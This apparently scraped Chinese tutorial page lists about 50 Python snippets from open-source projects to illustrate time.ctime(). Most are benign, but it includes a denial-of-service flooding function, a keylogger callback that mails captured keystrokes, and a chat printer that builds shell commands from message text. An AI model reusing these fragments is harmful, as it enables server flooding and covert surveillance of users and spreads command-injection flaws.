我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用time.ctime()。
def __init__(self, localaddr, remoteaddr): self._localaddr = localaddr self._remoteaddr = remoteaddr asyncore.dispatcher.__init__(self) try: self.create_socket(socket.AF_INET, socket.SOCK_STREAM) # try to re-use a server port if possible self.set_reuse_addr() self.bind(localaddr) self.listen(5) except: # cleanup asyncore.socket_map before raising self.close() raise else: print >> DEBUGSTREAM, \ '%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % ( self.__class__.__name__, time.ctime(time.time()), localaddr, remoteaddr)
def flatten(self, msg, unixfrom=False): """Print the message object tree rooted at msg to the output file specified when the Generator instance was created. unixfrom is a flag that forces the printing of a Unix From_ delimiter before the first object in the message tree. If the original message has no From_ delimiter, a `standard' one is crafted. By default, this is False to inhibit the printing of any From_ delimiter. Note that for subobjects, no From_ line is printed. """ if unixfrom: ufrom = msg.get_unixfrom() if not ufrom: ufrom = 'From nobody ' + time.ctime(time.time()) print >> self._fp, ufrom self._write(msg)
def load_stats(self, arg): if not arg: self.stats = {} elif isinstance(arg, basestring): f = open(arg, 'rb') self.stats = marshal.load(f) f.close() try: file_stats = os.stat(arg) arg = time.ctime(file_stats.st_mtime) + " " + arg except: # in case this is not unix pass self.files = [ arg ] elif hasattr(arg, 'create_stats'): arg.create_stats() self.stats = arg.stats arg.stats = {} if not self.stats: raise TypeError, "Cannot create or construct a %r object from '%r''" % ( self.__class__, arg) return
def __str__(self): lines = [] lines.append("{0:s} object, bound to {1:s}.".format(self.__class__.__name__, self._cb.session.server)) if self._last_refresh_time: lines.append(" Last refreshed at {0:s}".format(time.ctime(self._last_refresh_time))) if not self._full_init: lines.append(" Partially initialized. Use .refresh() to load all attributes") lines.append("-"*79) lines.append("") for attr in sorted(self._info): status = " " if attr in self._dirty_attributes: if self._dirty_attributes[attr] is None: status = "(+)" else: status = "(*)" val = str(self._info[attr]) if len(val) > 50: val = val[:47] + u"..." lines.append(u"{0:s} {1:>20s}: {2:s}".format(status, attr, val)) return "\n".join(lines)
def run(self): while self.finish_time == 0: time.sleep(.25) global_step_val, = self.sess.run([self.global_step_op]) if self.start_time == 0 and global_step_val >= self.start_at_global_step: # Use tf.logging.info instead of log_fn, since print (which is log_fn) # is not thread safe and may interleave the outputs from two parallel # calls to print, which can break tests. tf.logging.info('Starting real work at step %s at time %s' % (global_step_val, time.ctime())) self.start_time = time.time() self.start_step = global_step_val if self.finish_time == 0 and global_step_val >= self.end_at_global_step: tf.logging.info('Finishing real work at step %s at time %s' % (global_step_val, time.ctime())) self.finish_time = time.time() self.finish_step = global_step_val
def build_full_record_to(pathToFullRecordFile): """structure of full record: {commitID: {'build-time': time, files: {filename: {record}, filename: {record}}}} """ full_record = {} # this leads to being Killed by OS due to tremendous memory consumtion... #if os.path.isfile(pathToFullRecordFile): # with open(pathToFullRecordFile, 'r') as fullRecordFile: # print "loading full record from " + pathToFullRecordFile # full_record = eval(fullRecordFile.read()) # print "read full record from " + pathToFullRecordFile #else: full_record = build_full_record() # f = open(pathToFullRecordFile, 'w') # try: # f.write(repr(full_record) + "\n") # except MemoryError as me: # print me # raise # finally: # print time.ctime() # f.close() # print "built full record, wrote to " + pathToFullRecordFile return full_record
def build_full_record_to(path_to_full_record_file): """structure of full record: {commitID: {'build-time': time, files: {filename: {record}, filename: {record}}}} """ full_record = build_full_record() if DO_PRINT_RECORDS: f = open(path_to_full_record_file, 'w') try: f.write(repr(full_record) + "\n") except MemoryError as me: print me raise finally: print time.ctime() f.close() print "built full record, wrote to " + path_to_full_record_file return full_record
def attack(): ip = socket.gethostbyname( host ) global n msg=str(string.letters+string.digits+string.punctuation) data="".join(random.sample(msg,5)) dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: n+=1 dos.connect((ip, port)) dos.send( "GET /%s HTTP/1.1\r\n" % data ) print "\n "+time.ctime().split(" ")[3]+" "+"["+str(n)+"] #-#-# Hold Your Tears #-#-#" except socket.error: print "\n [ No connection! Server maybe down ] " dos.close()
def run(interval, command): print_ts("-"*100) print_ts("Command %s"%command) print_ts("Starting every %s seconds."%interval) print_ts("-"*100) while True: try: # sleep for the remaining seconds of interval time_remaining = interval-time.time()%interval print_ts("Sleeping until %s (%s seconds)..."%((time.ctime(time.time()+time_remaining)), time_remaining)) time.sleep(time_remaining) print_ts("Starting command.") # execute the command status = os.system(command) print_ts("-"*100) print_ts("Command status = %s."%status) except Exception, e: print e
def run(self, edit): """Sublime Text plugin run method.""" # Note, if one changes the header, this might need to change too. pattern = util.get_vhdl_setting(self, 'vhdl-modified-time-string') region = self.view.find(pattern, 0) #print('Region Diagnostics') #print('------------------') #print('Begin: {}'.format(region.begin())) #print('End: {}'.format(region.end())) #print('Empty? {}'.format(region.empty())) if not region.empty(): region = self.view.line(region) date = time.ctime(time.time()) new_mtime = pattern + '{}'.format(date) self.view.replace(edit, region, new_mtime) print('vhdl-mode: Updated last modified time.') else: print('vhdl-mode: No last modified time field found.') #----------------------------------------------------------------
def convert_all_files_in_path(self, path): if not os.path.exists(path): print("'%s': Path doesn't exists. Skipping" % path) return count = 0 for filename in os.listdir(path): full_path = os.path.join(path, filename) only_name, ext = os.path.splitext(full_path) cmd = None pyfile = None if fnmatch.fnmatch(filename, '*.ui'): pyfile = '%s.py' % only_name cmd = self.PYUIC elif fnmatch.fnmatch(filename, '*.qrc'): pyfile = '%s_rc.py' % only_name cmd = self.PYRCC if cmd and modified(full_path, pyfile): cmd_string = '%s -o "%s" "%s"' % (cmd, pyfile, full_path) os.system(cmd_string) count += 1 print("'%s': %s converted %s files" % (path, time.ctime(time.time()), count))
def file_mod_time(filepath): try: import time return time.ctime(os.path.getmtime(filepath)) except Exception as e: if DEBUG_FLAG: sys.stderr.write("Naked Framework Error: unable to return file modification data with the file_mod_time() function (Naked.toolshed.system).") raise e #------------------------------------------------------------------------------ # # FILE LISTINGS # #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ # [ list_all_files function ] (list) # returns a list of all files in developer specified directory # Tests: test_SYSTEM.py :: test_sys_list_all_files, test_sys_list_all_files_emptydir #------------------------------------------------------------------------------
def print_history(self, response, channel_name): os.system("clear; figlet '" + channel_name + "' | lolcat") response["messages"].reverse() text = "" for i in response["messages"]: if "user" in i: text += "\033[31m" + self.find_user_name(i["user"]) + "\033[0m" + "\t\t" elif "username" in i: text += "\033[31m" + (i["username"].encode('ascii', 'ignore').decode('ascii')) + "\033[0m" + "\t" text += "\033[93m" + time.ctime(float(i["ts"])) + "\033[0m" + "\n" # replace username_id with username if "<@" in i["text"]: i["text"] = "<" + i["text"].split("|")[1] text += (i["text"].encode('ascii', 'ignore').decode('ascii')) + "\n\n" os.system("echo ' " + text + "'") text = ""
def log(self,proto,data): if not self.logging: return peer = self.transport.getPeer() their_peer = self.otherConn.transport.getPeer() f=open(self.logging,"a") f.write("%s\t%s:%d %s %s:%d\n"%(time.ctime(), peer.host,peer.port, ((proto==self and '<') or '>'), their_peer.host,their_peer.port)) while data: p,data=data[:16],data[16:] f.write(string.join(map(lambda x:'%02X'%ord(x),p),' ')+' ') f.write((16-len(p))*3*' ') for c in p: if len(repr(c))>3: f.write('.') else: f.write(c) f.write('\n') f.write('\n') f.close()
def update_schedule(self, result = None, retval = None, extra_args = None): nowTime = time() nowTimereal = ctime(nowTime) if nowTime > 10000: print '[NTP]: setting E2 unixtime:',nowTime print '[NTP]: setting E2 realtime:',nowTimereal setRTCtime(nowTime) if config.misc.SyncTimeUsing.value == "1": eDVBLocalTimeHandler.getInstance().setUseDVBTime(False) else: eDVBLocalTimeHandler.getInstance().setUseDVBTime(True) eEPGCache.getInstance().timeUpdated() self.timer.startLongTimer(int(config.misc.useNTPminutes.value) * 60) else: print 'NO TIME SET' self.timer.startLongTimer(10)
def __repr__(self): timertype = { TIMERTYPE.NONE: "nothing", TIMERTYPE.WAKEUP: "wakeup", TIMERTYPE.WAKEUPTOSTANDBY: "wakeuptostandby", TIMERTYPE.AUTOSTANDBY: "autostandby", TIMERTYPE.AUTODEEPSTANDBY: "autodeepstandby", TIMERTYPE.STANDBY: "standby", TIMERTYPE.DEEPSTANDBY: "deepstandby", TIMERTYPE.REBOOT: "reboot", TIMERTYPE.RESTART: "restart" }[self.timerType] if not self.disabled: return "PowerTimerEntry(type=%s, begin=%s)" % (timertype, ctime(self.begin)) else: return "PowerTimerEntry(type=%s, begin=%s Disabled)" % (timertype, ctime(self.begin))
def getPriorityCheck(self,prioPT,prioPTae): shiftPT = breakPT = False nextPTlist = NavigationInstance.instance.PowerTimer.getNextPowerManagerTime(getNextTimerTyp = True) for entry in nextPTlist: #check timers within next 15 mins will started or ended if abs(entry[0] - time()) > 900: continue #faketime if entry[1] is None and entry[2] is None and entry[3] is None: if debug: print "shift#2 - entry is faketime", ctime(entry[0]), entry shiftPT = True continue #is timer in list itself? if entry[0] == self.begin and entry[1] == self.timerType and entry[2] is None and entry[3] == self.state \ or entry[0] == self.end and entry[1] is None and entry[2] == self.afterEvent and entry[3] == self.state: if debug: print "entry is itself", ctime(entry[0]), entry nextPTitself = True else: nextPTitself = False if (entry[1] in prioPT or entry[2] in prioPTae) and not nextPTitself: if debug: print "break#2 <= 900", ctime(entry[0]), entry breakPT = True break return shiftPT, breakPT
def TimeSynctimer(self): now = time() self.syncCount += 1 if now <= 31536000: if self.syncCount <= 24 and now <= 31536000: # max 2 mins or when time is in sync self.timesynctimer.start(5000, True) else: print "~"*100 print "[NAVIGATION] time sync failure, current time is %s, sync time is %s sec." % (ctime(now),(self.syncCount * 5)) if self.timertime > 0: print "[NAVIGATION] next '%s' starts at %s" % ({0:"record-timer",1:"zap-timer",2:"power-timer",3:"plugin-timer"}[self.wakeuptyp], ctime(self.timertime)) else: print "[NAVIGATION] no next timers" print "="*100 #workaround for normal operation if no time sync after e2 start - box is in standby self.gotopower() else: print "~"*100 print "[NAVIGATION] time sync successful, current time is %s, sync time is %s sec." % (ctime(now),(self.syncCount * 5)) self.wakeupCheck()
def log_events(log_info, type_event): log_msg = "[" + time.ctime() + "]" + "\n" + log_info if type_event == "fuzzing": try: fd = open('fuzz.log', 'a') except IOError as err: return "[!] Error opening log file: %s" % str(err) elif type_event == "error": try: fd = open('error.log', 'a') except IOError as err: return "[!] Error opening error file: %s" % str(err) else: return "[!] '%s' is an unrecognized log event type." % type_event if fd: fd.write(log_msg) return
def show_workspace_files(user_id, special_type='uploads'): import time import base64 user_files = [] user_path = os.path.join(get_config('env', 'workspace'), str(user_id), special_type) if not os.path.exists(user_path): os.makedirs(user_path) for file_name in os.listdir(user_path): file_path = os.path.join(user_path, file_name) tmp = dict() tmp['name'] = file_name tmp['file_size'] = os.path.getsize(file_path) tmp['file_create'] = time.ctime(os.path.getctime(file_path)) tmp['trace'] = base64.b64encode(os.path.join(special_type, file_name)) tmp['raw'] = os.path.join(special_type, file_name) user_files.append(tmp) user_files = sorted(user_files, key=lambda user_files: user_files['name']) return user_files
def predict_tf_all(path = None): result_list = [] p = m_Pool(31) result_list = p.map(predict_tf_once,range(1,32)) p.close() p.join() print 'writing...' result_df = pd.DataFrame(index = range(1)) for day,result in result_list: day_s = str(day) if len(day_s)<=1: day_s = '0'+day_s result_df['201610'+day_s] = result result_df = result_df.T result_df.columns = ['predict_power_consumption'] if path == None: date = str(pd.Timestamp(time.ctime())).replace(' ','_').replace(':','_') path = './result/'+date+'.csv' result_df.to_csv(path,index_label='predict_date') l = map(lambda day:pd.DataFrame.from_csv('./result/predict_part/%d.csv'%day),range(1,32)) t = pd.concat(l) t.to_csv('./result/predict_part/'+date+'.csv')
def signal_handler(signum, *kwargs): """ A handler for various interrupts """ global exit_flag exit_flag = True if signum == signal.SIGINT: print(ERROR + "user quit" + Style.RESET_ALL) else: print(ERROR + "signal caught: {}".format(signum) + Style.RESET_ALL) print("[*] shutting down at {}".format(time.ctime())) # let time for the threads to terminate time.sleep(2) sys.exit(0)
def cache_it(self, key, f, time_expire): if self.debug: self.r_server.incr('web2py_cache_statistics:misses') cache_set_key = self.cache_set_key expire_at = int(time.time() + time_expire) + 120 bucket_key = "%s:%s" % (cache_set_key, expire_at / 60) value = f() value_ = pickle.dumps(value, pickle.HIGHEST_PROTOCOL) if time_expire == 0: time_expire = 1 self.r_server.setex(key, time_expire, value_) # print '%s will expire on %s: it goes in bucket %s' % (key, time.ctime(expire_at)) # print 'that will expire on %s' % (bucket_key, time.ctime(((expire_at / 60) + 1) * 60)) p = self.r_server.pipeline() # add bucket to the fixed set p.sadd(cache_set_key, bucket_key) # sets the key p.setex(key, time_expire, value_) # add the key to the bucket p.sadd(bucket_key, key) # expire the bucket properly p.expireat(bucket_key, ((expire_at / 60) + 1) * 60) p.execute() return value
def do_ls(self, wildcard, display = True): if self.loggedIn is False: logging.error("Not logged in") return if self.tid is None: logging.error("No share selected") return if wildcard == '': pwd = ntpath.join(self.pwd,'*') else: pwd = ntpath.join(self.pwd, wildcard) self.completion = [] pwd = string.replace(pwd,'/','\\') pwd = ntpath.normpath(pwd) for f in self.smb.listPath(self.share, pwd): if display is True: print "%crw-rw-rw- %10d %s %s" % ( 'd' if f.is_directory() > 0 else '-', f.get_filesize(), time.ctime(float(f.get_mtime_epoch())), f.get_longname()) self.completion.append((f.get_longname(), f.is_directory()))
def draw(self, context): layout = self.layout netsettings = context.scene.network_render row = layout.row() row.template_list("UI_UL_list", "net_render_slaves", netsettings, "slaves", netsettings, "active_slave_index", rows=2) sub = row.column(align=True) sub.operator("render.netclientslaves", icon='FILE_REFRESH', text="") sub.operator("render.netclientblacklistslave", icon='ZOOMOUT', text="") if len(netrender.slaves) > netsettings.active_slave_index >= 0: layout.separator() slave = netrender.slaves[netsettings.active_slave_index] layout.label(text="Name: " + slave.name) layout.label(text="Address: " + slave.address[0]) layout.label(text="Seen: " + time.ctime(slave.last_seen)) layout.label(text="Stats: " + slave.stats)
def draw(self, context): layout = self.layout netsettings = context.scene.network_render row = layout.row() row.template_list("UI_UL_list", "net_render_slaves_blacklist", netsettings, "slaves_blacklist", netsettings, "active_blacklisted_slave_index", rows=2) sub = row.column(align=True) sub.operator("render.netclientwhitelistslave", icon='ZOOMOUT', text="") if len(netrender.blacklist) > netsettings.active_blacklisted_slave_index >= 0: layout.separator() slave = netrender.blacklist[netsettings.active_blacklisted_slave_index] layout.label(text="Name: " + slave.name) layout.label(text="Address: " + slave.address[0]) layout.label(text="Seen: " + time.ctime(slave.last_seen)) layout.label(text="Stats: " + slave.stats)
def getos(): dagitim=platform.dist() dagitim=dagitim[0] mimari=platform.machine() osys=platform.system() unumber = os.getuid() zaman=time.ctime() if unumber==0: kulanici="root" else: kulanici="No root" bilgi=""" ============================ CPU: {} OS: {} DAGITIM: {} KULANICI: {} ZAMAN: {} ============================""".format(mimari,osys,dagitim,kulanici,zaman) print(bilgi)
def logBasicSettings(): # record basic user inputs and settings to log file for future purposes import getpass, time f = open(textFilePath,'a+') f.write("\n################################################################################################################\n") f.write("Executing \"Export SSURGO Shapefiles\" tool\n") f.write("User Name: " + getpass.getuser() + "\n") f.write("Date Executed: " + time.ctime() + "\n") f.write("User Parameters:\n") f.write("\tFile Geodatabase Feature Dataset: " + inLoc + "\n") f.write("\tExport Folder: " + outLoc + "\n") #f.write("\tArea of Interest: " + AOI + "\n") f.close del f ## ===================================================================================
def save(self): # save frames info, do not overwrite. filepath = os.path.join(self.framedir, 'frames.json') obj = { 'ctime' : time.ctime(), 'device' : self.device_info, 'frames' : self.frames, } with open(filepath, 'w') as f: json.dump(obj, f, indent=2) # save draft info filepath = os.path.join(self.framedir, 'draft.json') with open(filepath, 'w') as f: json.dump(self.case_draft, f, indent=2) # make a copy at casedir filepath = os.path.join(self.casedir, 'case.json') with open(filepath, 'w') as f: json.dump(self.case_draft, f, indent=2) # generate_script self.generate_script()
def test_max_timeout(context, event_loop): temp_dir = os.path.join(context.config['work_dir'], "timeout") context.config['task_script'] = ( sys.executable, TIMEOUT_SCRIPT, temp_dir ) context.config['task_max_timeout'] = 3 event_loop.run_until_complete(task.run_task(context)) try: event_loop.run_until_complete(asyncio.sleep(10)) # Let kill() calls run except RuntimeError: pass files = {} for path in glob.glob(os.path.join(temp_dir, '*')): files[path] = (time.ctime(os.path.getmtime(path)), os.stat(path).st_size) print("{} {}".format(path, files[path])) for path in glob.glob(os.path.join(temp_dir, '*')): print("Checking {}...".format(path)) assert files[path] == (time.ctime(os.path.getmtime(path)), os.stat(path).st_size) assert len(files.keys()) == 6 # claim_work {{{1
def log(level, console_color, html_color, fmt, *args, **kwargs): global last_no, buffer_lock, buffer, buffer_size string = '%s - [%s] %s\n' % (time.ctime()[4:-5], level, fmt % args) buffer_lock.acquire() try: set_console_color(console_color) sys.stderr.write(string) set_console_color(reset_color) last_no += 1 buffer[last_no] = string buffer_len = len(buffer) if buffer_len > buffer_size: del buffer[last_no - buffer_size] except Exception as e: string = '%s - [%s]LOG_EXCEPT: %s, Except:%s<br>' % (time.ctime()[4:-5], level, fmt % args, e) last_no += 1 buffer[last_no] = string buffer_len = len(buffer) if buffer_len > buffer_size: del buffer[last_no - buffer_size] finally: buffer_lock.release() #=================================================================
def view_reading_list(opts): """ get the current reading list :param opts: """ if os.path.isfile(READING_LIST_ENTRY_FILE_PATH): with open(READING_LIST_ENTRY_FILE_PATH) as reading_list_entry: file_contents = yaml.load(reading_list_entry) file_contents = dict(file_contents) last_updated = time.ctime(os.path.getmtime(READING_LIST_ENTRY_FILE_PATH)) query = opts[1] params = opts[0] search = '' if query != 'None': search = "(filtered by " + params + ": " + query + ")" filtered_contents = [article for article in file_contents['entries'] if is_in_params(params, query, article)] file_contents = dict(entries=filtered_contents) chalk.blue("Your awesome reading list " + search) chalk.blue("Last updated: " + last_updated) print_reading_list(file_contents) else: empty_list_prompt()
def crawl(url): """ ????URL????????????????? """ try: html = requests.get(url) except: with open("log.log","a") as file: file.write("Http error on " + time.ctime()) time.sleep(60) return None soup = BeautifulSoup(html.text, 'lxml') data_list = [] for cont in soup.find_all("div", {"class":"content"}): raw_data = cont.get_text() data = raw_data.replace("\n","") data_list.append(data) return data_list
def OnKeyboardEvent(event): global yourgmail, yourgmailpass, sendto, interval data = '\n[' + str(time.ctime().split(' ')[3]) + ']' \ + ' WindowName : ' + str(event.WindowName) data += '\n\tKeyboard key :' + str(event.Key) data += '\n====================' global t, start_time t = t + data if len(t) > 500: f = open('Logfile.txt', 'a') f.write(t) f.close() t = '' if int(time.time() - start_time) == int(interval): Mail_it(t, pics_names) t = '' return True
def info(log:str,target='console'): """ log: text to record. target: 'console' to print log on screen or file to write in. """ if target=='console': thd=threading.Thread(target=print,args=(ctime(),':',log)) thd.setDaemon(True) thd.start() thd.join() else: try: thd=threading.Thread(target=print,args=(ctime(),':',log)) thd.setDaemon(True) thd.start() thd.join() except Exception as e: print(e)
def check_file_freshness(filename, newer_than=3600): """ Check a file exists, is readable and is newer than <n> seconds (where <n> defaults to 3600). """ # First check the file exists and is readable if not os.path.exists(filename): raise CriticalError("%s: does not exist." % (filename)) if os.access(filename, os.R_OK) == 0: raise CriticalError("%s: is not readable." % (filename)) # Then ensure the file is up-to-date enough mtime = os.stat(filename).st_mtime last_modified = time.time() - mtime if last_modified > newer_than: raise CriticalError("%s: was last modified on %s and is too old " "(> %s seconds)." % (filename, time.ctime(mtime), newer_than)) if last_modified < 0: raise CriticalError("%s: was last modified on %s which is in the " "future." % (filename, time.ctime(mtime)))
def download_course_tarball(self): ''' Download tar.gz of full course content (via Studio) ''' self.ensure_studio_site() if self.verbose: print "Downloading tar.gz for %s" % (self.course_id) url = '%s/export/%s?_accept=application/x-tgz' % (self.BASE, self.course_id) r3 = self.ses.get(url) if not r3.ok or (r3.status_code==404): url = '%s/export/slashes:%s+%s?_accept=application/x-tgz' % (self.BASE, self.course_id.replace('/','+'), sem) r3 = self.ses.get(url) dt = time.ctime(time.time()).replace(' ','_').replace(':','') ofn = '%s/COURSE-%s___%s.tar.gz' % (self.data_dir, self.course_id.replace('/','__'), dt) self.ensure_data_dir_exists() with open(ofn, 'w') as fp: fp.write(r3.content) print "--> %s" % (ofn) return ofn
def cache_it(self, key, f, time_expire): if self.debug: self.r_server.incr('web2py_cache_statistics:misses') cache_set_key = self.cache_set_key expireat = int(time.time() + time_expire) + 120 bucket_key = "%s:%s" % (cache_set_key, expireat / 60) value = f() value_ = pickle.dumps(value, pickle.HIGHEST_PROTOCOL) if time_expire == 0: time_expire = 1 self.r_server.setex(key, time_expire, value_) #print '%s will expire on %s: it goes in bucket %s' % (key, time.ctime(expireat)) #print 'that will expire on %s' % (bucket_key, time.ctime(((expireat/60) + 1)*60)) p = self.r_server.pipeline() #add bucket to the fixed set p.sadd(cache_set_key, bucket_key) #sets the key p.setex(key, time_expire, value_) #add the key to the bucket p.sadd(bucket_key, key) #expire the bucket properly p.expireat(bucket_key, ((expireat / 60) + 1) * 60) p.execute() return value
def getTimeTagStr(self): """Return the TimeTag as a human-readable string """ fract, secs = math.modf(self.timetag) out = time.ctime(secs)[11:19] out += ("%.3f" % fract)[1:] return out
def main_process(self, topicId): # print id reqdata = {'liveId': topicId} # ????? reqheaders = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'application/json', 'Host': 'h5-zb.leju.com', 'X-Requested-With': 'XMLHttpRequest', 'Origin': 'http://h5-zb.leju.com', 'Referer': 'http://zhichang.renren.com', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',} #'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', } time.sleep(random.random()) while True: nowTime = time.ctime() r = requests.post(self.url, data=reqdata, headers=reqheaders) msg = '====' + topicId +'====' tmpDict = r.json() if ('errorMsg' in tmpDict): errMsg = tmpDict['errorMsg'] print (nowTime + msg + errMsg) if ('result' in tmpDict): print (nowTime + msg + str(tmpDict['result'])) time.sleep(60.33);
def get_cnonce(self, nonce): # The cnonce-value is an opaque # quoted string value provided by the client and used by both client # and server to avoid chosen plaintext attacks, to provide mutual # authentication, and to provide some message integrity protection. # This isn't a fabulous effort, but it's probably Good Enough. dig = hashlib.sha1("%s:%s:%s:%s" % (self.nonce_count, nonce, time.ctime(), randombytes(8))).hexdigest() return dig[:16]
def GenerateBanner(self): return '/* This file has been automatically generated, you must _NOT_ edit it directly. (%s) */\n' % time.ctime() # Private methods
def _cnonce(): dig = _md5("%s:%s" % (time.ctime(), ["0123456789"[random.randrange(0, 9)] for i in range(20)])).hexdigest() return dig[:16]